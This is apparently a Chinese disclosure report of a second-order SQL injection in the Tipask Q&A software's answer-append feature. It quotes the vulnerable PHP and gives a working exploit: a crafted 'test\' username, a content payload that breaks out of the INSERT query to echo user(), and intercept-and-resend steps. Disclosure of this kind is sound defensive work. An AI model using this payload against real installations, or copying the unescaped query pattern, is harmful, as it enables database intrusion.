### 简要描述:
sql注入漏洞(2次注入)
### 详细说明:
官方最新源码测试
在control中answer.php中
```
* 追问模块---追问 */
function onappend() {
$this->load("message");
$qid = intval($this->get[2]) ? $this->get[2] : intval($this->post['qid']);
$aid = intval($this->get[3]) ? $this->get[3] : intval($this->post['aid']);
$question = $_ENV['question']->get($qid);
$answer = $_ENV['answer']->get($aid);
if (!$question || !$answer) {
$this->message("回答内容不存在!");
exit;
}
$viewurl = urlmap('question/view/' . $qid, 2);
if (isset($this->post['submit'])) {
//echo $this->user['username'];exit();
$_ENV['answer']->append($answer['id'], $this->user['username'], $this->user['uid'], $this->post['content']);
if ($answer['authorid'] == $this->user['uid']) {//继续回答
$_ENV['message']->add($this->user['username'], $this->user['uid'], $question['authorid'], $this->user['username'] . '继续回答了您的问题:' . $question['title'], $this->post['content'] . '<br /> <a href="' . url('question/view/' . $qid, 1) . '">点击查看</a>');
$_ENV['doing']->add($this->user['uid'], $this->user['username'], 7, $qid, $this->post['content']);
$this->message('继续回答成功!', $viewurl);
} else {//继续追问
$_ENV['message']->add($this->user['username'], $this->user['uid'], $answer['authorid'], $this->user['username'] . '对您的回答进行了追问', $this->post['content'] . '<br /> <a href="' . url('question/view/' . $qid, 1) . '">点击查看问题</a>');
$_ENV['doing']->add($this->user['uid'], $this->user['username'], 6, $qid, $this->post['content'], $answer['id'], $answer['authorid'], $answer['content']);
$this->message('继续提问成功!', $viewurl);
}
}
include template("appendanswer");
}
```
追加问题模块,
追问模块当中
$_ENV['answer']->append($answer['id'], $this->user['username'], $this->user['uid'], $this->post['content']);
其中$this->user['username'] 为从数据库当中取出来的值,未涉及过滤。
后面中$this->post['content']为可控的变量,即为评论内容。
跟踪该执行函数append,在model当中answer.class.php
```
/* 添加追问--追问--回答 */
function append($answerid, $author, $authorid, $content) {
//echo "INSERT INTO " . DB_TABLEPRE . "answer_append(appendanswerid,answerid,author,authorid,content,time) VALUES (NULL,$answerid,'$author',$authorid,'$content',{$this->base->time})";exit();
$this->db->query("INSERT INTO " . DB_TABLEPRE . "answer_append(appendanswerid,answerid,author,authorid,content,time) VALUES (NULL,$answerid,'$author',$authorid,'$content',{$this->base->time})");
return $this->db->insert_id();
}
```
可看到执行了一个insert sql语句
当其中我们控制$author即可,例如注册畸形用户名 test\ 或者 test'即可
当我们注册test\用户,content我们设置为 ,1,user(),1)#
最终执行语句如下:
INSERT INTO ask_answer_append(appendanswerid,answerid,author,authorid,content,time) VALUES (NULL,1,'test\’,4,’,1,user(),1)#aaaa’,1423503510)
执行如下
ask_answer_append(appendanswerid,answerid,author,authorid,content,time) VALUES (NULL,1,'test\’,4,’,1,user(),1)
即会再我们的追加问题当中直接回显root@localhost
利用步骤:
1、注册用户名为test\
2、编辑 http://localhost/tipask/?answer/append/1/1.html(需先提问,有人回答,才能追问)
[<img src="https://images.seebug.org/upload/201502/10092104a18b862478688428e730575f7e500a60.png" alt="22222222222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/10092104a18b862478688428e730575f7e500a60.png)
截取该包,他会自动加上<p>标签,所以得去掉该<p>标签,然后发送即可
如上图。
3、直接回显内容
[<img src="https://images.seebug.org/upload/201502/1009224581ecfc77ac40be42dd1efe04b3f5d47c.png" alt="88888889999999.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/1009224581ecfc77ac40be42dd1efe04b3f5d47c.png)
### 漏洞证明:
1、注册用户名为test\
2、编辑 http://localhost/tipask/?answer/append/1/1.html(需先提问,有人回答,才能追问)
[<img src="https://images.seebug.org/upload/201502/10092104a18b862478688428e730575f7e500a60.png" alt="22222222222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/10092104a18b862478688428e730575f7e500a60.png)
截取该包,他会自动加上<p>标签,所以得去掉该<p>标签,然后发送即可
如上图。
3、直接回显内容
[<img src="https://images.seebug.org/upload/201502/1009224581ecfc77ac40be42dd1efe04b3f5d47c.png" alt="88888889999999.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/1009224581ecfc77ac40be42dd1efe04b3f5d47c.png)
京公网安备 11010502034610号
暂无评论